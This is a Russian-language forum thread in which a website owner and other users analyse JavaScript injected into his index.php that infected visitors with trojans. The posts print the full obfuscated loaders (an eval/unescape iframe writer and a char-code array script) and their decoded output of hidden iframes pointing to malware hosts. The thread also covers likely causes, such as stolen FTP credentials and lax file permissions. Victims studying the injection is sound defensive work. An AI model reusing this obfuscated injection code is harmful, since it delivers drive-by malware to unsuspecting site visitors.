[SeT]

В общем такое дело. Когда захожу на свой сайт - меня атакует толпа троянов, несмотря на фаерволл.
Удалив их (около 15 вроде) решил разобраца в чём дело.
Зашёл через ФТП на свой сайт и из index.php вытащил интересный скрипт

<!--
var msg=314,d=document;
eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27% 3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%64%66%38%64%61%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f% 73%74%61%62%72%6f%6f%6d%2e%63%6e%2f%33%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74% 68%2e%72%61%6e%64%6f%6d%28%29%2a%31%38%31%33%35%29%2b%27%66%36%30%38%36%37%30%64%37%38%35%5c%27%20%77% 69%64%74%68%3d%34%30%33%20%68%65%69%67%68%74%3d%34%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79% 3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );
//-->

Немного переделав сделал так:

<!--
document.write(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27% 3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%64%66%38%64%61%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f% 73%74%61%62%72%6f%6f%6d%2e%63%6e%2f%33%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74% 68%2e%72%61%6e%64%6f%6d%28%29%2a%31%38%31%33%35%29%2b%27%66%36%30%38%36%37%30%64%37%38%35%5c%27%20%77% 69%64%74%68%3d%34%30%33%20%68%65%69%67%68%74%3d%34%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79% 3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29'));
//-->

и запустил через мозиллу (у неё эксплорреровских дыр нет). Вылез фрейм на сайт http://stabroom.cn/3.php
Зашёл опять через мозиллу - натолкнулся на новый скрипт:

a=new Array(59.63,104.63,101.9,113.96,96.76,108.81,100.83,31.99,114.95,113.93,98.83,60.99,33.79,103.81,115. 8,115.71,111.86,57.88,46.83,46.86,115.76,96.6,106.8,104.81,115.67,96.8,109.8,96.87,106.98,96.91,115.72, 96.79,45.68,98.98,109.64,46.91,113.95,96.83,46.86,104.96,109.79,45.91,98.66,102.88,104.97,62.66,56.72, 33.81,31.89,118.91,104.74,99.68,115.93,103.7,60.6,48.64,31.89,103.86,100.8,104.62,102.74,103.84,115.81, 60.76,48.68,31.68,114.73,115.6,120.7,107.6,100.84,60.67,33.98,117.65,104.83,114.91,104.7,97.66,104.99, 107.66,104.87,115.68,120.6,57.65,31.65,103.94,104.76,99.63,99.65,100.67,109.75,33.93,61.85,59.92,46.85, 104.89,101.64,113.92,96.77,108.85,100.8,61.92,59.77,104.93,101.72,113.93,96.95,108.69,100.79,31.82,114. 81,113.66,98.79,60.6,33.82,103.77,115.73,115.93,111.87,57.77,46.77,46.63,115.65,96.99,106.91,104.75,115. 85,96.77,109.94,96.92,106.75,96.84,115.84,96.98,45.65,98.95,109.81,46.97,113.63,96.62,46.82,104.72,109. 98,45.81,98.67,102.68,104.98,62.64,48.75,49.67,33.92,31.66,118.83,104.74,99.9,115.8,103.92,60.73,48.79, 31.79,103.79,100.67,104.69,102.98,103.84,115.8,60.88,48.71,31.85,114.76,115.65,120.71,107.8,100.78,60. 69,33.71,117.9,104.9,114.69,104.66,97.72,104.96,107.93,104.7,115.85,120.6,57.7,31.75,103.88,104.86,99. 68,99.97,100.99,109.97,33.98,61.88,59.79,46.77,104.66,101.62,113.84,96.69,108.63,100.94,61.74,59.98,104. 76,101.76,113.68,96.87,108.75,100.83,31.64,114.61,113.88,98.89,60.81,33.61,103.85,115.86,115.79,111.74, 57.93,46.9,46.75,114.62,115.81,96.92,97.68,113.88,110.79,110.69,108.78,45.78,98.95,109.92,46.62,108.94, 104.78,119.96,45.8,111.6,103.76,111.75,33.91,31.8,118.79,104.83,99.73,115.78,103.95,60.72,48.65,31.77, 103.72,100.97,104.85,102.81,103.6,115.72,60.93,48.75,31.87,114.9,115.67,120.61,107.83,100.65,60.86,33. 64,117.75,104.92,114.88,104.87,97.73,104.82,107.73,104.74,115.65,120.91,57.99,31.69,103.6,104.73,99.86, 99.95,100.86,109.8,33.9,61.76,59.74,46.66,104.72,101.77,113.9,96.87,108.91,100.6,61.65);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};

Тут у меня воображалка вообще сломалась и я хз чё с этим делать, вернее как это работает?

Зайдя на главную страницу того сайта понял, что он пустой, только для вирей создан. Дата создания сайта Wed Dec 19 03:35:41 2007. Примерно в это время на меня начали кидаться трояны с моего сайта. Если есть спецы по JS, скажите, что за скрипт такой?

Скрипты в IE не запускать! На сайт не заходить!

[HolyDel]

SeT, а каким макаром он у тебя в idnex.php оказался, кул хацкеры взломали аккаунт админа?

[SeT]

Я без понятия. Сайт на бесплатном хостинге. Причём заражены не все страницы. Скорее всего из-за того, что права доступа по умолчанию 777

[ПургопроносниК]

моя головоломка сломалась при виде скрипта первого...

[SeT]

погуглил слово stabroom. Даже гугл предупредил, что сайт опасен

[APXi]

Тоже такое было. Скорее всего это робот делает, на твоем компе был вирус и отправил пароли на фтп к твоему сайту, а потом произошло заражение файлов (index,php, dafault.aspx, index.htm и т.д.)

Цитата

a=new Array(59.63,104.63,101.9,113.96,96.76,108.81,100.83,31.99,114.95,113.93,98.83,60.99,33.79,103.81,115. 8,115.71,111.86,57.88,46.83,46.86,115.76,96.6,106.8,104.81,115.67,96.8,109.8,96.87,106.98,96.91,115.72, 96.79,45.68,98.98,109.64,46.91,113.95,96.83,46.86,104.96,109.79,45.91,98.66,102.88,104.97,62.66,56.72, 33.81,31.89,118.91,104.74,99.68,115.93,103.7,60.6,48.64,31.89,103.86,100.8,104.62,102.74,103.84,115.81, 60.76,48.68,31.68,114.73,115.6,120.7,107.6,100.84,60.67,33.98,117.65,104.83,114.91,104.7,97.66,104.99, 107.66,104.87,115.68,120.6,57.65,31.65,103.94,104.76,99.63,99.65,100.67,109.75,33.93,61.85,59.92,46.85, 104.89,101.64,113.92,96.77,108.85,100.8,61.92,59.77,104.93,101.72,113.93,96.95,108.69,100.79,31.82,114. 81,113.66,98.79,60.6,33.82,103.77,115.73,115.93,111.87,57.77,46.77,46.63,115.65,96.99,106.91,104.75,115. 85,96.77,109.94,96.92,106.75,96.84,115.84,96.98,45.65,98.95,109.81,46.97,113.63,96.62,46.82,104.72,109. 98,45.81,98.67,102.68,104.98,62.64,48.75,49.67,33.92,31.66,118.83,104.74,99.9,115.8,103.92,60.73,48.79, 31.79,103.79,100.67,104.69,102.98,103.84,115.8,60.88,48.71,31.85,114.76,115.65,120.71,107.8,100.78,60. 69,33.71,117.9,104.9,114.69,104.66,97.72,104.96,107.93,104.7,115.85,120.6,57.7,31.75,103.88,104.86,99. 68,99.97,100.99,109.97,33.98,61.88,59.79,46.77,104.66,101.62,113.84,96.69,108.63,100.94,61.74,59.98,104. 76,101.76,113.68,96.87,108.75,100.83,31.64,114.61,113.88,98.89,60.81,33.61,103.85,115.86,115.79,111.74, 57.93,46.9,46.75,114.62,115.81,96.92,97.68,113.88,110.79,110.69,108.78,45.78,98.95,109.92,46.62,108.94, 104.78,119.96,45.8,111.6,103.76,111.75,33.91,31.8,118.79,104.83,99.73,115.78,103.95,60.72,48.65,31.77, 103.72,100.97,104.85,102.81,103.6,115.72,60.93,48.75,31.87,114.9,115.67,120.61,107.83,100.65,60.86,33. 64,117.75,104.92,114.88,104.87,97.73,104.82,107.73,104.74,115.65,120.91,57.99,31.69,103.6,104.73,99.86, 99.95,100.86,109.8,33.9,61.76,59.74,46.66,104.72,101.77,113.9,96.87,108.91,100.6,61.65);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};

Эта херня после работы выдает вот это:

<iframe src="http://takitanakata.cn/ra/in.cgi?9" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://takitanakata.cn/ra/in.cgi?12" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://stabroom.cn/mix.php" width=1 height=1 style="visibility: hidden"></iframe>

[SeT]

ясно, куча фреймов, в каждом по трояну. Вот почему сразу толпа вирей нападает.

[SeT]

Это, у кого китайская кодировка настроена, зайдите на reg.cn узнайте на кого те сайты оформлены.

[Ботан]

Видел похожий вирь, со одного сайта тож такую фигню вытаскивал, где-то он у меня лежит, посмотрю, выложу.

[cafeogu]

А че делать надо чтоб толпа вирей сайт не атокавало?

[ПургопроносниК]

бить вирей по башке =) ну или молочко им прописать...

[SeT]

cafeogu (Feb 2 2008, 02:38) писал:

А че делать надо чтоб толпа вирей сайт не атокавало?

644 права доступа выставь на php-файлы

[cafeogu]

И даже на PHP.INI ? :)

[SeT]

ROFL причём тут ini файл?

[kris]

SeT (Feb 2 2008, 11:26) писал:

644 права доступа выставь на php-файлы

хочу сказать что права доступа 644 на расширение php не помогло
атака все равно прошла успешно

мы почистили все файлы index со всеми расширениями, и не уверены, что атака не произойдет повторно ...

ждем

[artsonik]

да просто уже шел залит на твоем сайте, менят алгоритм или ваще структура сайта в корне

[ARTem]

Все очень просто... был у вас вирус который все ваши сохраненные пароли выслал в инет которые стали доступны другим вирусякам... поэтому: 1. сайт в офлайн, 2. меняете пассворд на серьезный как минимум знаков 10 3. Чистите сайтик... 4. Возвращаете в онлайн